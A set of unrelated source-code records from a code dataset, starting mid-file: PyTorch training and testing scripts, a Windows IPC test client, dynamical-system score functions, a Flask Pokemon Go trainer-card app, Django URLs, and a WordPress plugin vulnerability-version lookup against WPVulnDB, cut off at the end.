we want to add a random str to the folder.\")\n parser.add_argument('--gpu-selection', type=int, default=1, help=\"selectgpu\")\n\n\n # Monitoring options\n parser.add_argument('--save-error', action='store_true', help='If we want to save the error for each tissue and each gene at every epoch.')\n parser.add_argument('--make-grid', default=True, type=bool, help='If we want to generate fake patients on a meshgrid accross the patient embedding space')\n parser.add_argument('--nb-gridpoints', default=50, type=int, help='Number of points on each side of the meshgrid')\n parser.add_argument('--load-folder', help='The folder where to load and restart the training.')\n parser.add_argument('--save-dir', default='./testing123/', help='The folder where everything will be saved.')\n\n return parser\n\ndef parse_args(argv):\n\n if type(argv) == list or argv is None:\n opt = build_parser().parse_args(argv)\n else:\n opt = argv\n\n return opt\n\ndef main(argv=None):\n\n opt = parse_args(argv)\n # TODO: set the seed\n seed = opt.seed\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.manual_seed(seed)\n\n exp_dir = opt.load_folder\n if exp_dir is None: # we create a new folder if we don't load.\n exp_dir = monitoring.create_experiment_folder(opt)\n\n # creating the dataset\n print (\"Getting the dataset...\")\n dataset = datasets.get_dataset(opt,exp_dir)\n\n # Creating a model\n print (\"Getting the model...\")\n\n my_model, optimizer, epoch, opt = monitoring.load_checkpoint(exp_dir, opt, dataset.dataset.input_size(), dataset.dataset.additional_info())\n\n # Training optimizer and stuff\n criterion = torch.nn.MSELoss()\n\n if not opt.cpu:\n print (\"Putting the model on gpu...\")\n my_model.cuda(opt.gpu_selection)\n\n # The training.\n print (\"Start training.\")\n #monitoring and predictions\n predictions =np.zeros((dataset.dataset.nb_patient,dataset.dataset.nb_gene))\n indices_patients = np.arange(dataset.dataset.nb_patient)\n indices_genes = np.arange(dataset.dataset.nb_gene)\n xdata = np.transpose([np.tile(indices_genes, len(indices_patients)),\n np.repeat(indices_patients, len(indices_genes))])\n progress_bar_modulo = len(dataset)/100\n for t in range(epoch, opt.epoch):\n\n start_timer = time.time()\n\n if opt.save_error:\n outfname_g = '_'.join(['gene_epoch',str(t),'prediction.npy'])\n outfname_g = os.path.join(exp_dir,outfname_g)\n outfname_t = '_'.join(['tissue_epoch',str(t),'prediction.npy'])\n outfname_t = os.path.join(exp_dir,outfname_t)\n train_trace = np.zeros((dataset.dataset.nb_gene, dataset.dataset.nb_patient))\n ### making predictions:\n nb_proteins = my_model.emb_3.weight.cpu().data.numpy().shape[0]\n nb_patients = my_model.emb_2.weight.cpu().data.numpy().shape[0]\n predictions_protein = np.zeros((nb_patients, nb_proteins))\n patient_embs = my_model.emb_2.weight.cpu().data.numpy()\n\n for patient in np.arange(nb_patients):\n new = my_model.generate_datapoint_protein(patient_embs[patient,:], gpu=2)\n new = new.cpu().data.numpy()\n predictions_protein[patient,:] = new[:,0]\n np.save(f'predictions_protein_{epoch}.npy', predictions_protein)\n\n\n for no_b, mini in enumerate(dataset):\n\n inputs, targets, inputs2, targets2 = mini[0], mini[1], mini[2], mini[3]\n \n\n inputs = Variable(inputs, requires_grad=False).float()\n targets = Variable(targets, requires_grad=False).float()\n inputs2 = Variable(inputs2, requires_grad=False).float()\n targets2 = Variable(targets2, requires_grad=False).float()\n\n if not opt.cpu:\n inputs = inputs.cuda(opt.gpu_selection)\n targets = targets.cuda(opt.gpu_selection)\n inputs2 = inputs2.cuda(opt.gpu_selection)\n targets2 = targets2.cuda(opt.gpu_selection)\n\n # Forward pass: Compute predicted y by passing x to the model\n y_pred = my_model([inputs, inputs2])\n\n #if opt.save_error:\n # Log the predicted values per sample and per gene (S.L. validation)\n # batch_inputs = mini[0].numpy()\n # predicted_values = y_pred.data.cpu().numpy()\n # train_trace[batch_inputs[:,0],batch_inputs[:,1]] = predicted_values[:,0]\n targets = torch.reshape(targets,(targets.shape[0],1))\n targets2 = torch.reshape(targets2,(targets2.shape[0],1))\n # Compute and print loss\n\n loss1 = criterion(y_pred[0], targets)\n loss2 = criterion(y_pred[1], targets2)\n loss = loss1+loss2\n if no_b % 5 == 0:\n print (f\"Doing epoch {t},examples{no_b}/{len(dataset)}.Loss:{loss.data.cpu().numpy().reshape(1,)[0]}\")\n\n # Saving the emb\n np.save(os.path.join(exp_dir, 'pixel_epoch_{}'.format(t)),my_model.emb_1.weight.cpu().data.numpy() )\n np.save(os.path.join(exp_dir,'digit_epoch_{}'.format(t)),my_model.emb_2.weight.cpu().data.numpy())\n\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #my_model.generate_datapoint([0,0], opt.gpu_selection)\n #monitoring.save_predictions(exp_dir, predictions)\n\n\n# for i in range(0,xdata.shape[0],1000):\n# #import pdb; pdb.set_trace()\n# inputs = torch.FloatTensor(xdata[i:i+1000,:])\n# inputs = Variable(inputs, requires_grad=False).float()\n# if not opt.cpu:\n# inputs = inputs.cuda(opt.gpu_selection)\n# y_pred = my_model(inputs).float()\n# predictions[inputs.data.cpu().numpy()[:,1].astype('int32'),inputs.data.cpu().numpy()[:,0].astype('int32')] = y_pred.data.cpu().numpy()[:,0]\n # monitoring.dump_error_by_tissue(train_trace, dataset.dataset.data, outfname_t, exp_dir, dataset.dataset.data_type, dataset.dataset.nb_patient)\n # monitoring.dump_error_by_gene(train_trace, dataset.dataset.data, outfname_g, exp_dir)\n\n\n #print (\"Saving the model...\")\n monitoring.save_checkpoint(my_model, optimizer, t, opt, exp_dir)\n\n\n# if opt.make_grid:\n# print ('generating grid and datapoints')\n\n# nb_points = opt.nb_gridpoints\n# x_min = min(my_model.emb_2.weight.data.cpu().numpy()[:,0])\n# y_min = min(my_model.emb_2.weight.data.cpu().numpy()[:,1])\n# x_max = max(my_model.emb_2.weight.data.cpu().numpy()[:,0])\n# y_max = max(my_model.emb_2.weight.data.cpu().numpy()[:,1])\n# x = np.linspace((np.floor(x_min*100))/100,(np.ceil(x_max*100))/100,nb_points)\n# y = np.linspace((np.floor(y_min*100))/100,(np.ceil(y_max*100))/100,nb_points)\n# X, Y = np.meshgrid(x,y)\n# T = []\n# print (f\"I'll be making {(X.shape[0]*X.shape[1])**2} samples for a grid of {X.shape[0]} by {X.shape[1]} \")\n# count = 0\n\n #for ix,iy in zip(X.reshape((X.shape[0]*X.shape[1],)),Y.reshape((Y.shape[0]*Y.shape[1],))):\n # if count%1000==0:\n # print(f'made {count} samples')\n #import pdb; pdb.set_trace()\n #np.save(os.path.join(exp_dir,'generated_patient{}'.format(count)),my_model.generate_datapoint([ix,iy],opt.gpu_selection).data.cpu().numpy())\n# T.append(my_model.generate_datapoint([ix,iy],opt.gpu_selection).data.cpu().numpy())\n# count+=1\n# np.save(os.path.join(exp_dir,'meshgrid_x.npy'),X)\n# np.save(os.path.join(exp_dir,'meshgrid_y.npy'),Y)\n# np.save(os.path.join(exp_dir,'generated_mesh_samples.npy'),T)\n\n\n\n #getting a datapoint embedding coordinate \n\n #inputs = torch.FloatTensor(xdata[i:i+1000,:])\n #inputs = Variable(inputs, requires_grad=False).float()\n #if not opt.cpu:\n # inputs = inputs.cuda(opt.gpu_selection)\n # y_pred = my_model(inputs).float()\n #predictions[inputs.data.cpu().numpy()[:,1].astype('int32'),inputs.data.cpu().numpy()[:,0].astype('int32')] = y_pred.data.cpu().numpy()[:,0]\n #emb_2 = (np.ones(emb_1.shape[0]*2).reshape((emb_1.shape[0],2)))*[0,0]\n\n\n\n\n #TODO: end of training, save the model and blah.\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main_doubleoutput.py","file_name":"main_doubleoutput.py","file_ext":"py","file_size_in_byte":11098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"206100587","text":"# -*- coding: utf-8 -*-\n\"\"\"Installer for the collective.transmogrifier package.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\n\nversion = '1.5.3.dev0'\nlong_description = '\\n\\n'.join([\n open('README.rst').read(),\n open('CHANGES.rst').read(),\n])\n\nsetup(\n name='collective.transmogrifier',\n version=version,\n description='A configurable pipeline, aimed at transforming content for '\n 'import and export',\n long_description=long_description,\n classifiers=[\n 'Framework :: Plone'\n ],\n keywords='content import filtering',\n author='Jarn',\n author_email='info@jarn.com',\n url='http://pypi.python.org/pypi/collective.transmogrifier',\n license='GPL',\n packages=find_packages('src', exclude=['ez_setup']),\n package_dir={'': 'src'},\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'Products.CMFCore',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"168803640","text":"import ipc_pb2\nimport time\nimport sys\nimport win32pipe, win32file, pywintypes\n\n\nimport mmap\nimport struct\ndef GetPipeName():\n\tshm = mmap.mmap(0, 4,'Local\\\\GoopyIPCSharedMemory', access=mmap.ACCESS_READ)\n\tsid = shm.read(4)\n\tsid = struct.unpack(\"I\", sid)\n\tprint(sid)\n#GetPipeName()\n#quit()\n\nhandle = win32file.CreateFile(\n r'\\\\.\\\\pipe\\\\com_google_ime_goopy_2ipc_server',\n win32file.GENERIC_READ | win32file.GENERIC_WRITE,\n 0,\n None,\n win32file.OPEN_EXISTING,\n 0,\n None)\n\n\ndef Send(msg):\n\tpack = msg.SerializeToString()\n\tdata = struct.pack('I', len(pack)+4)\n\twin32file.WriteFile(handle, data+pack)\n\tif msg.reply_mode == 1:\n\t\trc,resp = win32file.ReadFile(handle, 1024)\n\t\tres = ipc_pb2.Message()\n\t\tres.ParseFromString(resp[4:])\n\t\treturn res\n\nclass MyComponet:\n\tdef reg(self):\n\t\t### register componet message\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 1#0x0204\n\t\tmsg.reply_mode = 1\n\t\tcomponent_info = ipc_pb2.ComponentInfo()\n\t\tcomponent_info.string_id = 'input_in_python'\n\t\tcomponent_info.produce_message.append(0x0020)\n\t\tcomponent_info.produce_message.append(0x0200)\n\t\tcomponent_info.produce_message.append(0x0201)\n\t\tcomponent_info.produce_message.append(0x0204)\n\t\tcomponent_info.produce_message.append(0x0205)\n\t\tmsg.payload.component_info.append(component_info)\n\n\t\trep = Send(msg)\n\t\tprint(rep)\n\t\tself.source = rep.payload.component_info[0].id\n\t\n\tdef showToolBar(self):\n\t\t### show tool bar\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 0x0204\n\t\tmsg.reply_mode = 1\n\t\tmsg.source = self.source\n\t\tprint(msg)\n\t\trep = Send(msg)\n\t\tprint(rep)\n\n\n\n\tdef hideToolBar(self):\n\t\t### hide tool bar\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 0x0205\n\t\tmsg.reply_mode = 1\n\t\tmsg.source = self.source\n\t\tprint(msg)\n\t\trep = Send(msg)\n\t\tprint(rep)\n\n\tdef createContext(self):\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 0x0020\n\t\tmsg.reply_mode = 1\n\t\tmsg.source = self.source\n\t\tprint(msg)\n\t\trep = Send(msg)\n\t\tprint(rep)\n\t\tself.icid = rep.icid\n\tdef attachContext(self):\n\t\tpass\n\ncomp = MyComponet()\ncomp.reg()\ncomp.showToolBar()\nquit()\ncomp.createContext()\ntime.sleep(3)\nquit()\n### show composition ui\nmsg = ipc_pb2.Message()\nmsg.type = 0x0200\nmsg.reply_mode = 1\nmsg.source = source\nprint(msg)\nrep = Send(msg)\nprint(rep)\n\n#while True:\n\nhandle.close()\n","sub_path":"client/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"284754288","text":"from __future__ import print_function\n\nimport os\nimport datetime\nimport numpy as np\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.data\nfrom torch.autograd import Variable\n\nfrom tnn.utils.timer import Timer\nfrom tnn.utils.path import mkdir\nimport tnn.utils.meter as meter_utils\nimport tnn.network.net_utils as net_utils\n\n\nclass Tester(object):\n class TestParams(object):\n exp_name = 'Exp_name'\n\n batch_size = 32\n save_dir = None\n ckpt = None\n gpus = [0]\n\n print_freq = 20\n\n on_start_epoch_hooks = []\n\n def __init__(self, model, test_params, batch_processor, test_data):\n assert isinstance(test_params, self.TestParams)\n self.params = test_params\n self.test_data = test_data\n\n self.batch_processor = batch_processor\n self.batch_per_epoch = len(test_data)\n\n self.batch_timer = Timer()\n self.data_timer = Timer()\n\n mkdir(self.params.save_dir)\n # load model\n ckpt = self.params.ckpt\n if ckpt is None:\n ckpts = [fname for fname in os.listdir(self.params.save_dir) if os.path.splitext(fname)[-1] == '.h5']\n ckpt = os.path.join(\n self.params.save_dir, sorted(ckpts, key=lambda name: int(os.path.splitext(name)[0].split('_')[-1]))[-1]\n ) if len(ckpts) > 0 else None\n\n assert ckpt is not None\n\n meta = net_utils.load_net(ckpt, model)\n if meta[0] >= 0:\n self.last_epoch = meta[0]\n self.lr = meta[1]\n print('load model from {}, last epoch: {}, lr: {}'.format(ckpt, self.last_epoch, self.lr))\n\n self.model = nn.DataParallel(model, device_ids=self.params.gpus)\n self.model = self.model.cuda(device_id=self.params.gpus[0])\n self.model.eval()\n\n def test(self):\n\n for hook in self.on_start_epoch_hooks:\n hook(self)\n\n print('start eval...')\n\n self.data_timer.tic()\n self.batch_timer.tic()\n for step, batch in enumerate(self.test_data):\n inputs, _, saved_for_eval = self.batch_processor(self, batch)\n\n self.data_timer.toc()\n\n output, _ = self.model(*inputs)\n self.batch_timer.toc()\n\n if step % self.params.print_freq == 0:\n data_time = self.data_timer.duration\n batch_time = self.batch_timer.duration\n print('[{}/{}] ({:.2f}/{:.2f}s, fps:{:.1f}, rest: {})'.format(step, self.batch_per_epoch, data_time,\n batch_time,\n self.params.batch_size / batch_time,\n str(datetime.timedelta(\n seconds=int((self.batch_per_epoch - step) * batch_time)))))\n\n self.batch_timer.clear()\n self.data_timer.clear()\n\n yield output, saved_for_eval\n\n self.batch_timer.tic()\n self.data_timer.tic()\n","sub_path":"tnn/network/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"250686137","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 16:40:34 2019\n\n@author: pasca\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 15:32:19 2019\n\n@author: pasca\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 7 23:45:49 2019\n\n@author: pasca\n\"\"\"\n\nimport numpy as np\n\nimport sympy as sp\nimport sympy.abc\n\nimport sys\nsys.path.append('../')\n\nimport ellipsoid_fun\nimport trajectory_to_score_function\nimport h5py\n\n\n\n#%%\n# states\ntarget_state = np.array([2.559085486905914e-01, 1.783308009875336e+00, -1.475035829596991e+00, -1.825982757733474e+00])\ninitial_state = np.array([-2.559085486905914e-01, 1.783308009875336e+00, 1.475035829596991e+00, -1.825982757733474e+00])\nsaddle_state = np.array([0.0000000000E+00, 1.7163920088E+00, 0.0000000000E+00, -2.2021308316E+00])\n\n#%%\n#system parameters\ns=2 #unused\ncontrol_param = 4.9864471442E-01 #control parameter: region with 2 stable equilibria\n\ndist = np.linalg.norm(target_state-initial_state)\neta = np.linalg.norm(target_state-saddle_state)/np.linalg.norm(target_state-initial_state)\n\nc1 = 0.020736\nc2 = 0.018337\nc3 = 0.015617\nc4 = 0.031977\nc5 = 0.036673\nc6 = 0.046850 \nc7 = 0.314802\nl1 = 0.0128616\nl2 = 0.0211107\nl3 = 0.0318615\nl4 = 0.0427787\n\ndef force(v):\n return np.array([c1*v[0]*v[1] + c2*v[1]*v[2] + c3*v[2] *v[3] - l1*v[0],\n c4*v[1]*v[3] + c5*v[0]*v[2] - c1*v[0]*v[0] - l2*v[1] + c7*control_param,\n c6*v[0]*v[3] - (c2+c5)*v[0]*v[1] - l3*v[2],\n -c4*v[1]*v[1] - (c3+c6)*v[0]*v[2] - l4*v[3]])\n \nnoise_matrix = np.array([[0., 0., 0., 0.],\n [0., 1., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.]])\n \n\n#sympy force matrix\nx1,x2,x3,x4 = sp.abc.symbols('x:4')\n\nforce_matrix = sp.Matrix([c1*x1*x2 + c2*x2*x3 + c3*x3 *x4 - l1*x1,\n c4*x2*x4 + c5*x1*x3 - c1*x1*x1 - l2*x2 + c7*control_param,\n c6*x1*x4 - (c2+c5)*x1*x2 - l3*x3,\n -c4*x2*x2 - (c3+c6)*x1*x3 - l4*x4])\n\n#%%\n#reduction\nsigma = 0.02\ncovariance_matrix_start, quad_form_initial, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, initial_state, sigma, noise_matrix=noise_matrix)\ncovariance_matrix_target, quad_form_target, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, target_state, sigma, noise_matrix=noise_matrix)\na = np.linalg.eig(np.linalg.inv(covariance_matrix_target))\nspectrum, eigvec = np.linalg.eig(np.linalg.inv(covariance_matrix_start))\n\n#%%\n#score functions\n\ndef score_function_fred(v):\n da = np.linalg.norm(v-initial_state)\n db = np.linalg.norm(v-target_state)\n if da <= db: \n return da/2/db\n else:\n return 1-db/2/da\n \n\ndef score_function_linear(v):\n score = np.sum((target_state-initial_state)*(v-initial_state)) / np.linalg.norm(target_state-initial_state)**2\n if score >=0:\n return score\n else:\n return 1e-5\n\ndef score_function_norm(v):\n x,y=v\n return 1/2*np.sqrt((x+1)**2+1/2*y**2)\n\n\n\ndef score_function_circle_maker(param = 4):\n \"\"\"\n param: decay rate of the exponentials\n \"\"\"\n dist = np.linalg.norm(target_state-initial_state)\n eta = np.linalg.norm(saddle_state-initial_state)/dist\n \n def score_function(v):\n return eta - eta*np.exp(-param*(np.linalg.norm(v-initial_state)/dist)**2)+(1-eta)*np.exp(-param*(np.linalg.norm(v-target_state)/dist)**2)\n return score_function\n\n\n\ndef score_function_ellipsoid_maker(param = 0.05, sigma=0.05):\n \"\"\"\n param: decay rate of the exponentials\n \"\"\"\n eta = np.linalg.norm(target_state-saddle_state)/np.linalg.norm(target_state-initial_state)\n \n covariance_matrix_start, quad_form_initial, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, initial_state, sigma, noise_matrix=noise_matrix)\n covariance_matrix_target, quad_form_target, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, target_state, sigma, noise_matrix=noise_matrix)\n \n def score_function(v):\n return eta - eta*np.exp(-param*quad_form_initial(v))+(1-eta)*np.exp(-param*quad_form_target(v))\n \n return score_function\n\ndef score_function_custom_maker(filename='trajectory.hdf5', decay=0.2):\n \"\"\"\n param: trajectory file with key \"filled_path\"\n decay\n \"\"\"\n with h5py.File(filename, 'r') as file:\n filled_path = file['filled_path'][:]\n file.close()\n score_function = trajectory_to_score_function.score_function_maker(filled_path.T, decay)\n \n return score_function\n\n\n\n\n\n\n\n\n\n\n\n\n#%% \n#tests\ntest = 0\nif test:\n dim = 4\n bound = 3\n resolution = 10\n equilibrium_point = np.zeros(4)\n xi = np.linspace(-bound, bound, resolution)\n grids =np.meshgrid(*[xi+equilibrium_point[i] for i in range(dim)])\n grid = np.array(list(grids))\n \n function_values = np.apply_along_axis(score_function_simexp_ell_param, 0, grid)\n #ell = np.where(np.abs(quad_form_values-level)'.format(self.id)\n\n\n@app.route(\"/\")\ndef hello():\n return render_template('login_page.html')\n\n\n@app.route(\"/handle-request\", methods=['POST'])\ndef handle_request():\n auth_type = str(request.form.get('auth_type'))\n username = str(request.form.get('username'))\n password = str(request.form.get('password'))\n db_id = 0\n try:\n db_id = get_player_details_from_server(auth_type, username, password)\n except pgoapi.AuthException:\n return render_template('login_page.html', error='Authentication Error')\n if not db_id:\n return render_template('login_page.html', error='Authentication Error')\n return make_response(redirect(\"/get-card/{0}\".format(db_id)))\n\n\n@app.route(\"/get-card/\")\ndef get_card(db_id):\n try:\n record_id = HASHIDS.decode(db_id)[0]\n player_object = compute_player_details(record_id)\n except ValueError:\n return render_template('trainer_card.html',\n error='Trainer Card not found')\n tweet = 'Check out my awesome retro Pokemon Go Trainer Card by ' \\\n '@colinwren - {0}'.format(request.url)\n twitter_link = urllib.quote(tweet)\n return render_template('trainer_card.html', player=player_object,\n tweet_text=twitter_link)\n\n\ndef compute_player_details(db_id):\n player_data = TrainerCard.query.get(db_id)\n if not player_data:\n raise ValueError('No player data found')\n account_created = datetime.fromtimestamp(int(player_data.time_ms) / 1000)\n now = datetime.now()\n account_age = (now - account_created).__str__().split('.')[0]\n team = TEAMS[player_data.team]\n return {\n 'username': player_data.username,\n 'account_age': account_age,\n 'level': player_data.level,\n 'pokemon': player_data.pokemon,\n 'team': team\n }\n\n\ndef get_player_details_from_server(auth_type, username, password):\n api = pgoapi.PGoApi()\n # get data\n if api.login(auth_type, username, password):\n api_call = api.get_player().get_inventory().call()\n\n # sort data\n player_data = api_call.get('responses')\\\n .get('GET_PLAYER')\\\n .get('player_data')\n inventory_data = api_call.get('responses')\\\n .get('GET_INVENTORY')\\\n .get('inventory_delta')\\\n .get('inventory_items')\n inventory_items = \\\n [i.get('inventory_item_data') for i in inventory_data]\n player_username = player_data.get('username')\n account_created_long = player_data.get('creation_timestamp_ms')\n # currencies = {}\n # for currency in player_data.get('currencies'):\n # currencies[currency.get('name')] = currency.get('amount')\n player_stats = {}\n # items = []\n # pokemon = []\n # pokemon_candy = []\n # pokedex_entries = []\n for item in inventory_items:\n if item.get('player_stats'):\n player_stats = item.get('player_stats')\n # if item.get('pokemon_data'):\n # pokemon.append(item.get('pokemon_data'))\n # if item.get('pokemon_family'):\n # pokemon_candy.append(item.get('pokemon_family'))\n # if item.get('item'):\n # items.append(item.get('item'))\n # if item.get('pokedex_entry'):\n # pokedex_entries.append(item.get('pokedex_entry'))\n # store data\n card = TrainerCard(player_username, account_created_long,\n player_stats.get('level'),\n player_stats.get('unique_pokedex_entries'),\n player_data.get('team', 0))\n db.session.add(card)\n db.session.commit()\n return HASHIDS.encode(card.id)\n return False\n\n\n@app.route('/static/')\ndef send_js(path):\n return send_from_directory(script_path + '/static/', path)\n\n\nif __name__ == \"__main__\":\n app.run(port=8000)\n","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"66384570","text":"#!user/bin/python\r\nnum1 = 20\r\nnum2 = 30\r\nnum3 = 35\r\nif (num1>=num2)and (num1>=num3):\r\n greatest=num1\r\nelif(num2>=num3):\r\n greatest=num2\r\nelse:\r\n greatest=num3\r\nprint (\"The greatest number is\",greatest)\r\n\r\n","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"578230053","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom rest_framework import routers\nfrom cal import views\nfrom asg.users import views as uviews\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'events', views.EventViewSet)\nrouter.register(r'pgroups', views.PGroupViewSet)\nrouter.register(r'factions', views.FactionViewSet)\nrouter.register(r'slots', views.SlotViewSet)\nrouter.register(r'entries', views.EntryViewSet)\nrouter.register(r'users', uviews.UserViewSet)\n\nurlpatterns = [\n url(r'^$', TemplateView.as_view(template_name='pages/home.html'), name=\"home\"),\n url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name=\"about\"),\n\n # Django Admin\n url(r'^admin/', include(admin.site.urls)),\n\n # User management\n url(r'^users/', include(\"asg.users.urls\", namespace=\"users\")),\n url(r'^accounts/', include('allauth.urls')),\n\n # Your stuff: custom urls includes go here\n url(r'^api/', include(router.urls)),\n url(r'^', include('cal.urls', namespace='cal')),\n url(r'^nested_admin/', include('nested_admin.urls')),\n\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'^400/$', 'django.views.defaults.bad_request'),\n url(r'^403/$', 'django.views.defaults.permission_denied'),\n url(r'^404/$', 'django.views.defaults.page_not_found'),\n url(r'^500/$', 'django.views.defaults.server_error'),\n ]\n","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"179164202","text":"import json\nimport requests\n\nfrom pkg_resources import parse_version\nfrom libs import WordstressScraper\n\n\nclass WPVulnDBLookup(WordstressScraper):\n def __init__(self, *args, **kwargs):\n super(WPVulnDBLookup, self).__init__(*args, **kwargs)\n self.fullinventory()\n self.wpvulndbbaseurl = 'https://wpvulndb.com/api/v2'\n self.vulndbjson = None\n self.jsonout[\"wp_version\"][\"vulnerabilities\"] = []\n self.jsonout[\"confirmed_vulns\"] = {}\n self.jsonout[\"confirmed_vulns\"][\"coreversion\"] = []\n self.jsonout[\"confirmed_vulns\"][\"plugins\"] = []\n self.vulnmajver = None\n self.vulnminver = None\n self.pluginfilename = None\n self.plugindirname = None\n\n def corelookup(self):\n \"\"\"\n :return: dictionary\n \"\"\"\n version = self.wpcoreversion.split('.')\n self.wpcoremajorver = version[0]\n self.wpcoreminorver = version[1]\n self.wpcorepatchver = version[2]\n self.fullurl = '{}/wordpresses/{}{}{}'.format(self.wpvulndbbaseurl, self.wpcoremajorver, self.wpcoreminorver,\n self.wpcorepatchver)\n self.pullvulndata()\n try:\n self.vulndbjson = json.loads(self.r.text)\n\n for vuln in self.vulndbjson[self.wpcoreversion][\"vulnerabilities\"]:\n try:\n if self.versioncheck(_curver=self.wpcoreversion, _fixed_in=vuln[\"fixed_in\"]):\n self.jsonout[\"wp_version\"][\"vulnerabilities\"].append(vuln)\n self.jsonout[\"confirmed_vulns\"][\"coreversion\"].append(vuln)\n except Exception as E:\n self.log.error('Error somewhere in corelookup(). {}'.format(E))\n continue\n except Exception as E:\n self.log.error('Error somewhere in corelookup(). {}'.format(E))\n pass\n return self.jsonout[\"wp_version\"]\n\n def pluginlookup(self):\n \"\"\"\n Notes: wpvulndb is not consistent in how it archives plugin names. \n Sometimes the folder of the plugin should be the api request. \n Other times it is the plugin file name sans .php. \n Some plugins that have 'premium' or 'pro' on them dont seem to return.\n \n Anomaly: https://wpvulndb.com/api/v2/plugins/wordpress-varnish \n vs \n https://wpvulndb.com/api/v2/plugins/wp-varnish\n \n ^ The wp-varnish output has 'latest_version':null where the other has the\n actual version. Need to check for 'null' in current_version output. Also we'll need\n to test both the folder name and the filename.\n \n If wpvulndb wont return anything for the plugin, it will throw status 404\n :return: \n \"\"\"\n\n for inventory_key, inventory_val in self.jsonout[\"plugins\"].items():\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = {}\n plg = inventory_val[\"pluginpath\"].split(\"/\")\n if len(plg) == 2:\n self.plugindirname = plg[0]\n self.pluginfilename = plg[1]\n self.fullurl = '{}/plugins/{}'.format(self.wpvulndbbaseurl, self.plugindirname)\n self.log.info('attempting to pull from wpvulndb: {}'.format(self.fullurl))\n if len(plg) == 1:\n self.pluginfilename = inventory_key.replace(' ', '-')\n self.fullurl = '{}/plugins/{}'.format(self.wpvulndbbaseurl, self.pluginfilename)\n self.log.warning(\n 'something funky with this plugin. Likely only has a filename to go off of.: {}'.format(\n self.fullurl))\n\n self.pullvulndata()\n if self.r.status_code == 404:\n try:\n self.fullurl = '{}/plugins/{}'.format(self.wpvulndbbaseurl, self.pluginfilename[:-4])\n self.pullvulndata()\n for wpvdb_key, wpvdb_val in json.loads(self.r.text).items():\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = wpvdb_val\n except Exception as E:\n self.log.error(\n 'plugin=\\\"{}\\\" function=\\\"pluginlookup()\\\" wpvulndbstatuscode=\\\"{}\\\" exception=\\\"{}\\\" ' \\\n 'msg=\\\"Prob couldnt find by pluginfilename. \\\"'.format(\n self.pluginfilename,\n self.r.status_code, E))\n continue\n try:\n for wpvdb_key, wpvdb_val in json.loads(self.r.text).items():\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = wpvdb_val\n if wpvdb_val[\"vulnerabilities\"]:\n for vuln in self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"][\"vulnerabilities\"]:\n if self.versioncheck(_curver=inventory_val[\"version\"],\n _fixed_in=vuln[\"fixed_in\"],\n _name=inventory_key):\n vuln[\"vulnerablestatus\"] = True\n self.jsonout['confirmed_vulns']['plugins'].append(vuln)\n else:\n vuln[\"vulnerablestatus\"] = False\n else:\n self.log.info('No vulns found on wpvulndb for {}. skipping'.format(self.r.url))\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = wpvdb_val\n\n except Exception as E:\n self.log.error(\n 'plugin=\\\"{}\\\" function=\\\"pluginlookup()\\\" wpvulndbstatuscode=\\\"{}\\\" exception=\\\"{}\\\" ' \\\n 'msg=\\\"Prob couldnt find by plugindirname.\\\"'.format(\n self.plugindirname,\n self.r.status_code, E))\n continue\n return self.jsonout[\"plugins\"]\n\n def versioncheck(self, _curver, _fixed_in, _name='None'):\n if _fixed_in is None:\n self.log.info('{} is vulnerable. _curver: {} _fixed_in: {}'.format(_name, _curver, _fixed_in))\n return True\n if parse_version(_curver) 